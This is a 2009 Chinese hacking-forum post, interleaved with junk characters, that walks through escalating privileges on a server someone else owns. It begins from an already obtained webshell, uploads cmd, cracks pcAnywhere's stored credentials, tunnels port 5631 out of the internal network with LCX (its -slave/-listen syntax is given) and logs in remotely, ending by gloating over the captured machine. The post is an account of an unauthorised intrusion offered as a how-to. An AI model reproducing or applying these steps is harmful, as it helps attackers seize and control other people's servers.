|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
$ j* t e. m% L7 i: @" i+ {
% t4 T! u8 O, y# ]; T9 ^2 t提权方法:pcanywhere+LCX0 Y- R* ^/ O" J3 U. v2 j
, i1 @5 M2 O5 ?% g) a v* n获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。1 p8 D. V+ K, U- H7 w; R0 l
2 M& ]# i% D$ T$ E0 [& {$ y在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
5 F8 N$ {. J, T. w4 N7 J: ?" _; m4 I5 Y) i, F7 J1 [" R
' j; O9 ~0 @, [查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。; \0 j& u+ e' }. R- n+ @
4 E* | T$ K8 ~6 V- w u& t5 M5 D9 W1 V
, K- c0 h. [6 M呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。& Q9 i; q+ h2 A3 A3 ?& ^
$ l$ k: j9 \- h2 P( o4 y/ E, m# ~) L8 F* o/ Q+ g
3 D0 E" n2 D! F- j
. H' y8 [! R3 |由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``2 g" Y, T& J" T) [
6 D8 _2 W- A* I3 g' }# z' ~ p4 S A+ h
LCX的用法再简单说下:
$ f" R( c+ G: C% H+ F/ ^ O5 J* |2 V9 U
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
7 f) ~+ H" n& O7 [
4 A! |. L0 f' n% a1 a+ P本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)" E! [% p0 ]. }2 u% F5 ]
6 u* P" d, J" s9 F/ }0 I, ?1 D; z
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。1 Y: n' P( i8 C6 b/ _
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``0 V: e% Q4 ? a5 h
" l. U. H* W k% A* F! k2 M P+ p& f* R, y3 H
5 |' C0 L3 m; X2 Q: t
3 \' ] ]+ f7 k# J& ~
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
/ h6 E9 a ^( i* W" `* V2 w8 ]2 e9 H0 G
2 {2 }8 F- G8 Y |9 f) }
; F# G3 S0 m; t' g8 O1 i" S9 l
3 l! ~ n# h, l我们本地连接试试,输入我们刚破解的账号密码
9 F# W- I ^1 {' k% C3 Q: q
; m% K5 }+ j+ u3 `! r! d0 ]8 J! f& Z2 Z) @6 m1 d2 _
呵呵``连接成功,服务器不错,又一个8核^︵^- B' } o4 l2 ?: q
$ P! u* v7 N% t7 h _. x
p |% L2 [8 M1 t5 _* | h7 Q9 X; U/ z% N2 W
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
